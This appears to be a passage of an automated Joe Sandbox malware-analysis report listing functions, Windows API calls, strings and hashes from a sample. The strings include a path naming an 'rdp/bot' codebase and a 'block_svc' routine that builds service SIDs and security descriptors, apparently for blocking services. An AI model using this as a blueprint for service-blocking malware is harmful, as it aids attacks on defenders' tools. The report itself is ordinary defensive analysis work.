_initterm.MSVCRT ref: 00007FF764CC11AE
_initterm.MSVCRT ref: 00007FF764CC11D3
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF764CC1212
malloc.MSVCRT ref: 00007FF764CC1244
strlen.MSVCRT ref: 00007FF764CC125C
malloc.MSVCRT ref: 00007FF764CC1268
_cexit.MSVCRT(?,?,?,00007FF764CC1313), ref: 00007FF764CC12E3

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
Instruction ID: fd862d8d91a473b852a0ec42a43626578bc862121e482e39af54525eb090989d
Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
Instruction Fuzzy Hash: B0510A29A08A46C5EF61BF1BE8D0679B7A0AF45B84F849137DD0E47392DE2DE441CB60

Function 00007FF764CC8CFC Relevance: 40.5, APIs: 9, Strings: 14, Instructions: 281
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF764CC9BB9: strcmp.MSVCRT ref: 00007FF764CC9CAD

Part of subcall function 00007FF764CC1CF4: LoadLibraryA.KERNEL32 ref: 00007FF764CC1D02

FreeLibrary.KERNEL32 ref: 00007FF764CC8DAC

Part of subcall function 00007FF764CC1C73: GetProcAddress.KERNEL32 ref: 00007FF764CC1C93

strlen.MSVCRT ref: 00007FF764CC8EEF
GetProcessHeap.KERNEL32 ref: 00007FF764CC8F6B
HeapAlloc.KERNEL32 ref: 00007FF764CC8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF764CC9010

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF764CC905D
GetProcessHeap.KERNEL32 ref: 00007FF764CC90F2
HeapFree.KERNEL32 ref: 00007FF764CC9103
LocalFree.KERNEL32 ref: 00007FF764CC91E4

Part of subcall function 00007FF764CC14E2: EnterCriticalSection.KERNEL32 ref: 00007FF764CC15B3
Part of subcall function 00007FF764CC14E2: LeaveCriticalSection.KERNEL32 ref: 00007FF764CC15DB
Part of subcall function 00007FF764CC14E2: CopyFileA.KERNEL32 ref: 00007FF764CC1638

Strings

[I] (%s) -> Done(svc_name=%s), xrefs: 00007FF764CC91F9
block_svc, xrefs: 00007FF764CC8E31, 00007FF764CC8E4B, 00007FF764CC9070, 00007FF764CC90CC, 00007FF764CC91F2
RtlCopyMemory, xrefs: 00007FF764CC8E09
RtlAnsiStringToUnicodeString, xrefs: 00007FF764CC8D73
[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx), xrefs: 00007FF764CC8E38
ntdll.dll, xrefs: 00007FF764CC8D5F
svc, xrefs: 00007FF764CC8D2C
RtlCreateServiceSid, xrefs: 00007FF764CC8DB7
RtlZeroMemory, xrefs: 00007FF764CC8DF1
RtlFreeUnicodeString, xrefs: 00007FF764CC8DD4
mem_alloc, xrefs: 00007FF764CC90AC
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF764CC9077
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF764CC90B3
[E] (%s) -> RtlCreateServiceSid failed(res=%08lx), xrefs: 00007FF764CC8E52, 00007FF764CC90D3

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
API String ID: 3039259412-1782951725
Opcode ID: 9e86f076a43906582c62a39a38202cec83d6d18429b70aa02fdbb9b6048d0588
Instruction ID: 458669b21a3dd2e0558ca9e5a014fe52575a2900f1c041699fa931c02d07810f
Opcode Fuzzy Hash: 9e86f076a43906582c62a39a38202cec83d6d18429b70aa02fdbb9b6048d0588
Instruction Fuzzy Hash: CBD12D21A0C683D5FB70AF06E4C07BAB250EF84748F906037DA8D46795EE7DE985CB21

Function 00007FF764CC433B Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF764CC4363
_errno.MSVCRT ref: 00007FF764CC444F
_errno.MSVCRT ref: 00007FF764CC4470
fwrite.MSVCRT ref: 00007FF764CC44E4

Strings

[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FF764CC43CC
fs_file_write, xrefs: 00007FF764CC43C5, 00007FF764CC43FB, 00007FF764CC442B, 00007FF764CC445D, 00007FF764CC450D, 00007FF764CC45BD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC4402, 00007FF764CC4432
(path != NULL), xrefs: 00007FF764CC43F4
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC43ED, 00007FF764CC441D
(mode != NULL), xrefs: 00007FF764CC4424
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FF764CC45C4
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF764CC4514
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF764CC4464
NULL, xrefs: 00007FF764CC459A, 00007FF764CC45A6

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: _errno$fopenfwrite
String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 1336347884-544371937
Opcode ID: 0b39eb2f910dab185a7673a380ff908b930334aecfe01f99a9ff25874f59d934
Instruction ID: 552ff3ad90513c2691ceb0b4f4e7aff2f29231137010c884003e39476f5b3f02
Opcode Fuzzy Hash: 0b39eb2f910dab185a7673a380ff908b930334aecfe01f99a9ff25874f59d934
Instruction Fuzzy Hash: 3F516A61A08642C2EE20BF57E9C06B8E391AF80794FD89137D90D477A5DE2CE946CB24

Function 00007FF764CC168C Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF764CC16AC
GetLastError.KERNEL32 ref: 00007FF764CC17E0

Part of subcall function 00007FF764CC19C0: GetModuleHandleExA.KERNEL32 ref: 00007FF764CC19DE

strlen.MSVCRT ref: 00007FF764CC16FE
strlen.MSVCRT ref: 00007FF764CC171A
strcat.MSVCRT ref: 00007FF764CC1735
strlen.MSVCRT ref: 00007FF764CC173D
strlen.MSVCRT ref: 00007FF764CC1752
fopen.MSVCRT ref: 00007FF764CC1778

Strings

log, xrefs: 00007FF764CC1767
wfpblk.l, xrefs: 00007FF764CC175A
Done, xrefs: 00007FF764CC191D
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FF764CC17A5
[I] (%s) -> %s, xrefs: 00007FF764CC192B
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FF764CC17F2
debug_init, xrefs: 00007FF764CC179E, 00007FF764CC17C3, 00007FF764CC17EB, 00007FF764CC18B0, 00007FF764CC1924
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FF764CC18B7
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF764CC17CA

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
API String ID: 3395718042-2291025694
Opcode ID: fdb988f6f537efc24a501cecd9faf7d516723a0c125085d3e8e56e994361fdc5
Instruction ID: 1d5f0e0f002473ec15251840da7d428fd3438a0927a6de1498b093a21002da82
Opcode Fuzzy Hash: fdb988f6f537efc24a501cecd9faf7d516723a0c125085d3e8e56e994361fdc5
Instruction Fuzzy Hash: 53510960E0C603C1FA30BF5BA8D03B9DA55AF45744FD4A133C90E067A2DE6DB946CB61

Function 00007FF764CC5E6F Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 199
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 00007FF764CC5EC7
LockFileEx.KERNEL32 ref: 00007FF764CC5F00
GetLastError.KERNEL32 ref: 00007FF764CC5FD5
GetLastError.KERNEL32 ref: 00007FF764CC60BA
CloseHandle.KERNEL32 ref: 00007FF764CC622E

Strings

[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FF764CC60CF
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FF764CC6252
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC5F8F, 00007FF764CC5FBF
(path != NULL), xrefs: 00007FF764CC5F81
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC5F7A, 00007FF764CC5FAA
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FF764CC5FEA
fs_file_lock, xrefs: 00007FF764CC5F54, 00007FF764CC5F88, 00007FF764CC5FB8, 00007FF764CC5FE3, 00007FF764CC60C8, 00007FF764CC624B
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC5F5B
(lock != NULL), xrefs: 00007FF764CC5FB1
NULL, xrefs: 00007FF764CC6239

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
API String ID: 2747014929-530486279
Opcode ID: 15d915de4211def4f8d6226962a28e1180589ebbaf15e866cd92251583b9c7a8
Instruction ID: 08391cee374d3325d91d7e90a91cc06e8256f617ad677ff0e3a56a1de7d77f8c
Opcode Fuzzy Hash: 15d915de4211def4f8d6226962a28e1180589ebbaf15e866cd92251583b9c7a8
Instruction Fuzzy Hash: 78815E60E0C70BC1FA34BF56A5C0379E2509F00355FD46233DA6E477D1EEADA9868B62

Function 00007FF764CC97F2 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF764CC983D
HeapFree.KERNEL32 ref: 00007FF764CC984E

Part of subcall function 00007FF764CC45D5: fopen.MSVCRT ref: 00007FF764CC461A
Part of subcall function 00007FF764CC45D5: fseek.MSVCRT ref: 00007FF764CC4639
Part of subcall function 00007FF764CC45D5: _errno.MSVCRT ref: 00007FF764CC464D
Part of subcall function 00007FF764CC45D5: _errno.MSVCRT ref: 00007FF764CC4668

GetProcessHeap.KERNEL32 ref: 00007FF764CC997A
HeapAlloc.KERNEL32 ref: 00007FF764CC998B
strncpy.MSVCRT ref: 00007FF764CC9ACC
strncpy.MSVCRT ref: 00007FF764CC9AE3
strncpy.MSVCRT ref: 00007FF764CC9B42

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC9886
mem_alloc, xrefs: 00007FF764CC99D3
(path != NULL), xrefs: 00007FF764CC98B4
[I] (%s) -> Done(path=%s), xrefs: 00007FF764CC9BA8
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF764CC98AD
5, xrefs: 00007FF764CC98A5
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF764CC99DA
ini_load, xrefs: 00007FF764CC987F, 00007FF764CC98BB, 00007FF764CC9BA1
NULL, xrefs: 00007FF764CC9B92
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC98C2

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
API String ID: 1423203057-2746879330
Opcode ID: 625e14a2c0319edb11a8671c5d5937e69af5c2f16708fc5f91877772a9fd1444
Instruction ID: a2d9d84402f83249a84c3b261d1eec559e15f2216c0b17135afb400dda309057
Opcode Fuzzy Hash: 625e14a2c0319edb11a8671c5d5937e69af5c2f16708fc5f91877772a9fd1444
Instruction Fuzzy Hash: DAA19D62A0D686D1EF30AF07E4907B9AB61EF41788FC86033DA4D47795DE6CE545CB20

Function 00007FF764CC9195 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF764CC8EEF
GetProcessHeap.KERNEL32 ref: 00007FF764CC8F6B
HeapAlloc.KERNEL32 ref: 00007FF764CC8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF764CC9010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF764CC905D
GetProcessHeap.KERNEL32 ref: 00007FF764CC90F2
HeapFree.KERNEL32 ref: 00007FF764CC9103

Strings

block_svc, xrefs: 00007FF764CC9070
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF764CC9077

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: 7a2bc89e0e95705e93dc6a483fc78728a0ae83035528600c77e8b8795ebba7cf
Instruction ID: f7284d07c7bb589596ae140daeb30d627c7636cd539368a5e2d333638218a1cf
Opcode Fuzzy Hash: 7a2bc89e0e95705e93dc6a483fc78728a0ae83035528600c77e8b8795ebba7cf
Instruction Fuzzy Hash: FE514C22608BC2C5EB709F16E4843AAB7A0FB84748F805136CA8D43B98EF7DD549CB50

Function 00007FF764CC918B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF764CC8EEF
GetProcessHeap.KERNEL32 ref: 00007FF764CC8F6B
HeapAlloc.KERNEL32 ref: 00007FF764CC8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF764CC9010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF764CC905D
GetProcessHeap.KERNEL32 ref: 00007FF764CC90F2
HeapFree.KERNEL32 ref: 00007FF764CC9103

Strings

block_svc, xrefs: 00007FF764CC9070
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF764CC9077

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: f5ade81bab610ed3c45f77ecbc0485a539bdfa577f56cbaabe67d1e6d3cacaf8
Instruction ID: be61216980e517508a2c330d7726f835e91da7e5e9b54f42cdb270e489f17747
Opcode Fuzzy Hash: f5ade81bab610ed3c45f77ecbc0485a539bdfa577f56cbaabe67d1e6d3cacaf8
Instruction Fuzzy Hash: 2D514C32608BC2C5EB709F16E4843AAB7A0FB84749F805136CA8D43B98EF7DD549CB50

Function 00007FF764CC9181 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF764CC8EEF
GetProcessHeap.KERNEL32 ref: 00007FF764CC8F6B
HeapAlloc.KERNEL32 ref: 00007FF764CC8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF764CC9010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF764CC905D
GetProcessHeap.KERNEL32 ref: 00007FF764CC90F2
HeapFree.KERNEL32 ref: 00007FF764CC9103

Strings

block_svc, xrefs: 00007FF764CC9070
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF764CC9077

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: c122462ddc06ce98c00caf7f9bdd7b611d9b43429d298ccdaf14c786086906bd
Instruction ID: e4b98b5151020daedcbc15938a648658a3c4716596ad2bc182502622a63c67dc
Opcode Fuzzy Hash: c122462ddc06ce98c00caf7f9bdd7b611d9b43429d298ccdaf14c786086906bd
Instruction Fuzzy Hash: 80514C32608BC2C5EB709F16E4843AAB7A0FB84748F805136CA8D43B98EF7DD549CB51

Function 00007FF764CC9D40 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00007FF764CC9E2C

Strings

(name != NULL), xrefs: 00007FF764CC9DB5
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FF764CC9E5D
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF764CC9D7B, 00007FF764CC9DAE, 00007FF764CC9DE1
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FF764CC9EA5
ini_get_var, xrefs: 00007FF764CC9D89, 00007FF764CC9DBC, 00007FF764CC9DEF, 00007FF764CC9E56, 00007FF764CC9E9E
NULL, xrefs: 00007FF764CC9EBE, 00007FF764CC9EC7
(var != NULL), xrefs: 00007FF764CC9DE8
(sec != NULL), xrefs: 00007FF764CC9D82
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC9D90, 00007FF764CC9DC3, 00007FF764CC9DF6

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 77dca7da4658c8b5d52ea4299f8eeec008c0d1c2f296eb3cde6d171fa38a49ae
Instruction ID: 96629eff1e229a9dd81ffe2559297efabf5d31c8f9b0f326a99135fdd3ed61f7
Opcode Fuzzy Hash: 77dca7da4658c8b5d52ea4299f8eeec008c0d1c2f296eb3cde6d171fa38a49ae
Instruction Fuzzy Hash: 1D412762A08647E1FA24AF43E9807B5A260FF50348FD8503BDA4D0A795DF3CE646CB64

Function 00007FF764CC9BB9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00007FF764CC9CAD

Strings

[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF764CC9D0B
(name != NULL), xrefs: 00007FF764CC9C2E
(ini != NULL), xrefs: 00007FF764CC9BFB
ini_get_sec, xrefs: 00007FF764CC9C02, 00007FF764CC9C35, 00007FF764CC9C68, 00007FF764CC9CC6, 00007FF764CC9D04
